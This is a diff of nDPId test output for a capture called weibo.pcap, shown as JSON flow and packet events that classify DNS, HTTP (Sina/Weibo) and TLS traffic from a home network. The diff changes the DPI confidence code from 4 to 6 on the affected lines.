00477{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":425,"source":"weibo.pcap","alias":"nDPId-test","flow_id":40,"flow_packet_id":1,"flow_last_seen":1463089073760,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1463089073760,"pkt":"kDVu60UQeJKcD6iOCABFAAA8np1AAEAG913AqAFpKpy4E8wvAbt9EpT8AAAAAKACchBGkwAAAgQFtAQCCAoAQQphAAAAAAEDAwc="} 00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":426,"source":"weibo.pcap","alias":"nDPId-test","flow_id":41,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1463089073760,"flow_last_seen":1463089073760,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1463089073760,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"42.156.184.19","src_port":52272,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00477{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":426,"source":"weibo.pcap","alias":"nDPId-test","flow_id":41,"flow_packet_id":1,"flow_last_seen":1463089073760,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1463089073760,"pkt":"kDVu60UQeJKcD6iOCABFAAA8jjVAAEAGB8bAqAFpKpy4E8wwAbsmFYRUAAAAAKACchCuNwAAAgQFtAQCCAoAQQphAAAAAAEDAwc="} 
00603{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":429,"source":"weibo.pcap","alias":"nDPId-test","flow_id":24,"flow_packet_id":2,"flow_last_seen":1463089073763,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":166,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":166,"pkt_l4_len":132,"thread_ts_msec":1463089073763,"pkt":"eJKcD6iOkDVu60UQCABFAACYAABAAEARtprAqAEBwKgBaQA1hB4AhOXUkPeBgAABAAMAAAAABWxvZ2luBnRhb2JhbwNjb20AAAEAAcAMAAUAAQAAASwADAl3YWdicmlkZ2XAEsAuAAUAAQAAAMgAJgl3YWdicmlkZ2UGdGFvYmFvA2NvbQNnZHMKYWxpYmFiYWRuc8AZwEYAAQABAAAALwAEjM2qPw=="} -00784{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":429,"source":"weibo.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1463089073289,"flow_last_seen":1463089073763,"flow_idle_time":200000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":124,"flow_tot_l4_payload_len":158,"flow_avg_l4_payload_len":79,"midstream":0,"thread_ts_msec":1463089073763,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"192.168.1.1","src_port":33822,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"login.taobao.com","num_queries":1,"num_answers":3,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"140.205.170.63"}} +00784{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":429,"source":"weibo.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1463089073289,"flow_last_seen":1463089073763,"flow_idle_time":200000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":124,"flow_tot_l4_payload_len":158,"flow_avg_l4_payload_len":79,"midstream":0,"thread_ts_msec":1463089073763,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"192.168.1.1","src_port":33822,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": 
{"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"login.taobao.com","num_queries":1,"num_answers":3,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"140.205.170.63"}} 00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":430,"source":"weibo.pcap","alias":"nDPId-test","flow_id":42,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1463089073764,"flow_last_seen":1463089073764,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1463089073764,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"140.205.170.63","src_port":47721,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":430,"source":"weibo.pcap","alias":"nDPId-test","flow_id":42,"flow_packet_id":1,"flow_last_seen":1463089073764,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1463089073764,"pkt":"kDVu60UQeJKcD6iOCABFAAA8woBAAEAGfx3AqAFpjM2qP7ppAbuaKMjiAAAAAKACchCy\/gAAAgQFtAQCCAoAQQpiAAAAAAEDAwc="} 00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":435,"source":"weibo.pcap","alias":"nDPId-test","flow_id":30,"flow_packet_id":2,"flow_last_seen":1463089073773,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1463089073773,"pkt":"eJKcD6iOkDVu60UQCABFAAA0AABAADEGjQneSRxgwKgBaQBQpSMt08jatYdf34ASOQjHwAAAAgQFqAEBBAIBAwMI"} 
00450{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":436,"source":"weibo.pcap","alias":"nDPId-test","flow_id":30,"flow_packet_id":3,"flow_last_seen":1463089073773,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1463089073773,"pkt":"kDVu60UQeJKcD6iOCABFAAAoVdlAAEAGKDzAqAFp3kkcYKUjAFC1h1\/fLdPI21AQAOVAqwAA"} -00930{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":437,"source":"weibo.pcap","alias":"nDPId-test","flow_id":30,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1463089073394,"flow_last_seen":1463089073773,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":428,"flow_tot_l4_payload_len":428,"flow_avg_l4_payload_len":107,"midstream":0,"thread_ts_msec":1463089073773,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"222.73.28.96","src_port":42275,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.Sina(Weibo)","breed":"Fun","category":"SocialNetwork"},"http": {"hostname":"u1.img.mobile.sina.cn","url":"u1.img.mobile.sina.cn\/public\/files\/image\/620x300_img5653d57c6dab2.png","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (X11; Linux x86_64) AppleWebKit\/537.36 (KHTML, like Gecko) Chrome\/50.0.2661.102 Safari\/537.36"}} +00930{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":437,"source":"weibo.pcap","alias":"nDPId-test","flow_id":30,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1463089073394,"flow_last_seen":1463089073773,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":428,"flow_tot_l4_payload_len":428,"flow_avg_l4_payload_len":107,"midstream":0,"thread_ts_msec":1463089073773,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"222.73.28.96","src_port":42275,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": 
{"6":"DPI"},"proto":"HTTP.Sina(Weibo)","breed":"Fun","category":"SocialNetwork"},"http": {"hostname":"u1.img.mobile.sina.cn","url":"u1.img.mobile.sina.cn\/public\/files\/image\/620x300_img5653d57c6dab2.png","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (X11; Linux x86_64) AppleWebKit\/537.36 (KHTML, like Gecko) Chrome\/50.0.2661.102 Safari\/537.36"}} 00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":440,"source":"weibo.pcap","alias":"nDPId-test","flow_id":43,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1463089073788,"flow_last_seen":1463089073788,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1463089073788,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"42.156.184.19","src_port":52274,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00477{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":440,"source":"weibo.pcap","alias":"nDPId-test","flow_id":43,"flow_packet_id":1,"flow_last_seen":1463089073788,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1463089073788,"pkt":"kDVu60UQeJKcD6iOCABFAAA8M4FAAEAGYnrAqAFpKpy4E8wyAbubxznpAAAAAKACchCC5wAAAgQFtAQCCAoAQQpoAAAAAAEDAwc="} 
00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":441,"source":"weibo.pcap","alias":"nDPId-test","flow_id":44,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1463089073789,"flow_last_seen":1463089073789,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1463089073789,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"140.205.170.63","src_port":47723,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
@@ -174,18 +173,18 @@ 00582{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":498,"source":"weibo.pcap","alias":"nDPId-test","flow_id":30,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1463089073394,"flow_last_seen":1463089073773,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":428,"flow_tot_l4_payload_len":428,"flow_avg_l4_payload_len":107,"midstream":0,"thread_ts_msec":1463089073893,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"222.73.28.96","src_port":42275,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00650{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":498,"source":"weibo.pcap","alias":"nDPId-test","flow_id":37,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1463089073537,"flow_last_seen":1463089073537,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1463089073893,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"222.73.28.96","src_port":42280,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} 00576{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":498,"source":"weibo.pcap","alias":"nDPId-test","flow_id":37,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1463089073537,"flow_last_seen":1463089073537,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1463089073893,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"222.73.28.96","src_port":42280,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00687{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":498,"source":"weibo.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1463089073286,"flow_last_seen":1463089073393,"flow_idle_time":200000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":117,"flow_tot_l4_payload_len":156,"flow_avg_l4_payload_len":78,"midstream":0,"thread_ts_msec":1463089073893,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"192.168.1.1","src_port":18035,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Sina(Weibo)","breed":"Fun","category":"SocialNetwork"}} -00673{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":498,"source":"weibo.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1463089070757,"flow_last_seen":1463089070841,"flow_idle_time":200000,"flow_min_l4_payload_len":27,"flow_max_l4_payload_len":43,"flow_tot_l4_payload_len":70,"flow_avg_l4_payload_len":35,"midstream":0,"thread_ts_msec":1463089073893,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"192.168.1.1","src_port":54988,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"}} +00687{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":498,"source":"weibo.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1463089073286,"flow_last_seen":1463089073393,"flow_idle_time":200000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":117,"flow_tot_l4_payload_len":156,"flow_avg_l4_payload_len":78,"midstream":0,"thread_ts_msec":1463089073893,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"192.168.1.1","src_port":18035,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": 
{"6":"DPI"},"proto":"DNS.Sina(Weibo)","breed":"Fun","category":"SocialNetwork"}} +00673{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":498,"source":"weibo.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1463089070757,"flow_last_seen":1463089070841,"flow_idle_time":200000,"flow_min_l4_payload_len":27,"flow_max_l4_payload_len":43,"flow_tot_l4_payload_len":70,"flow_avg_l4_payload_len":35,"midstream":0,"thread_ts_msec":1463089073893,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"192.168.1.1","src_port":54988,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"}} 00645{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":498,"source":"weibo.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1463089071730,"flow_last_seen":1463089071755,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1463089073893,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"216.58.212.69","src_port":37802,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"2":"Match by IP"},"proto":"TLS.Google","breed":"Acceptable","category":"Web"}} 00578{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":498,"source":"weibo.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1463089071730,"flow_last_seen":1463089071755,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1463089073893,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"216.58.212.69","src_port":37802,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00697{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":498,"source":"weibo.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"finished","flow_packets_processed":106,"flow_first_seen":1463089072445,"flow_last_seen":1463089073885,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":4308,"flow_tot_l4_payload_len":69723,"flow_avg_l4_payload_len":657,"midstream":0,"thread_ts_msec":1463089073893,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"93.188.134.246","src_port":35803,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.Sina(Weibo)","breed":"Fun","category":"SocialNetwork"}} -00696{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":498,"source":"weibo.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"finished","flow_packets_processed":72,"flow_first_seen":1463089072445,"flow_last_seen":1463089073773,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":2872,"flow_tot_l4_payload_len":49381,"flow_avg_l4_payload_len":685,"midstream":0,"thread_ts_msec":1463089073893,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"93.188.134.246","src_port":35804,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.Sina(Weibo)","breed":"Fun","category":"SocialNetwork"}} 
-00696{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":498,"source":"weibo.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"finished","flow_packets_processed":41,"flow_first_seen":1463089072445,"flow_last_seen":1463089073819,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1436,"flow_tot_l4_payload_len":20463,"flow_avg_l4_payload_len":499,"midstream":0,"thread_ts_msec":1463089073893,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"93.188.134.246","src_port":35805,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.Sina(Weibo)","breed":"Fun","category":"SocialNetwork"}} -00695{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":498,"source":"weibo.pcap","alias":"nDPId-test","flow_id":25,"flow_state":"finished","flow_packets_processed":13,"flow_first_seen":1463089073319,"flow_last_seen":1463089073551,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1436,"flow_tot_l4_payload_len":3815,"flow_avg_l4_payload_len":293,"midstream":0,"thread_ts_msec":1463089073893,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"93.188.134.246","src_port":35806,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.Sina(Weibo)","breed":"Fun","category":"SocialNetwork"}} 
-00696{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":498,"source":"weibo.pcap","alias":"nDPId-test","flow_id":26,"flow_state":"finished","flow_packets_processed":53,"flow_first_seen":1463089073321,"flow_last_seen":1463089073852,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1436,"flow_tot_l4_payload_len":32930,"flow_avg_l4_payload_len":621,"midstream":0,"thread_ts_msec":1463089073893,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"93.188.134.246","src_port":35807,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.Sina(Weibo)","breed":"Fun","category":"SocialNetwork"}} +00697{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":498,"source":"weibo.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"finished","flow_packets_processed":106,"flow_first_seen":1463089072445,"flow_last_seen":1463089073885,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":4308,"flow_tot_l4_payload_len":69723,"flow_avg_l4_payload_len":657,"midstream":0,"thread_ts_msec":1463089073893,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"93.188.134.246","src_port":35803,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"HTTP.Sina(Weibo)","breed":"Fun","category":"SocialNetwork"}} 
+00696{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":498,"source":"weibo.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"finished","flow_packets_processed":72,"flow_first_seen":1463089072445,"flow_last_seen":1463089073773,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":2872,"flow_tot_l4_payload_len":49381,"flow_avg_l4_payload_len":685,"midstream":0,"thread_ts_msec":1463089073893,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"93.188.134.246","src_port":35804,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"HTTP.Sina(Weibo)","breed":"Fun","category":"SocialNetwork"}} +00696{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":498,"source":"weibo.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"finished","flow_packets_processed":41,"flow_first_seen":1463089072445,"flow_last_seen":1463089073819,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1436,"flow_tot_l4_payload_len":20463,"flow_avg_l4_payload_len":499,"midstream":0,"thread_ts_msec":1463089073893,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"93.188.134.246","src_port":35805,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"HTTP.Sina(Weibo)","breed":"Fun","category":"SocialNetwork"}} 
+00695{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":498,"source":"weibo.pcap","alias":"nDPId-test","flow_id":25,"flow_state":"finished","flow_packets_processed":13,"flow_first_seen":1463089073319,"flow_last_seen":1463089073551,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1436,"flow_tot_l4_payload_len":3815,"flow_avg_l4_payload_len":293,"midstream":0,"thread_ts_msec":1463089073893,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"93.188.134.246","src_port":35806,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"HTTP.Sina(Weibo)","breed":"Fun","category":"SocialNetwork"}} +00696{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":498,"source":"weibo.pcap","alias":"nDPId-test","flow_id":26,"flow_state":"finished","flow_packets_processed":53,"flow_first_seen":1463089073321,"flow_last_seen":1463089073852,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1436,"flow_tot_l4_payload_len":32930,"flow_avg_l4_payload_len":621,"midstream":0,"thread_ts_msec":1463089073893,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"93.188.134.246","src_port":35807,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"HTTP.Sina(Weibo)","breed":"Fun","category":"SocialNetwork"}} 00652{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":498,"source":"weibo.pcap","alias":"nDPId-test","flow_id":27,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1463089073322,"flow_last_seen":1463089073383,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1463089073893,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"93.188.134.246","src_port":35808,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by 
port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} 00578{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":498,"source":"weibo.pcap","alias":"nDPId-test","flow_id":27,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1463089073322,"flow_last_seen":1463089073383,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1463089073893,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"93.188.134.246","src_port":35808,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00696{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":498,"source":"weibo.pcap","alias":"nDPId-test","flow_id":28,"flow_state":"finished","flow_packets_processed":35,"flow_first_seen":1463089073334,"flow_last_seen":1463089073893,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1436,"flow_tot_l4_payload_len":20023,"flow_avg_l4_payload_len":572,"midstream":0,"thread_ts_msec":1463089073893,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"93.188.134.246","src_port":35809,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.Sina(Weibo)","breed":"Fun","category":"SocialNetwork"}} +00696{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":498,"source":"weibo.pcap","alias":"nDPId-test","flow_id":28,"flow_state":"finished","flow_packets_processed":35,"flow_first_seen":1463089073334,"flow_last_seen":1463089073893,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1436,"flow_tot_l4_payload_len":20023,"flow_avg_l4_payload_len":572,"midstream":0,"thread_ts_msec":1463089073893,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"93.188.134.246","src_port":35809,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": 
{"6":"DPI"},"proto":"HTTP.Sina(Weibo)","breed":"Fun","category":"SocialNetwork"}} 00583{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":498,"source":"weibo.pcap","alias":"nDPId-test","flow_id":32,"flow_state":"info","flow_packets_processed":5,"flow_first_seen":1463089073424,"flow_last_seen":1463089073885,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":398,"flow_tot_l4_payload_len":398,"flow_avg_l4_payload_len":79,"midstream":0,"thread_ts_msec":1463089073893,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"93.188.134.246","src_port":35811,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00651{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":498,"source":"weibo.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1463089071994,"flow_last_seen":1463089072138,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1463089073893,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"54.225.163.210","src_port":40440,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"2":"Match by IP"},"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"}} 00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":498,"source":"weibo.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1463089071994,"flow_last_seen":1463089072138,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1463089073893,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"54.225.163.210","src_port":40440,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
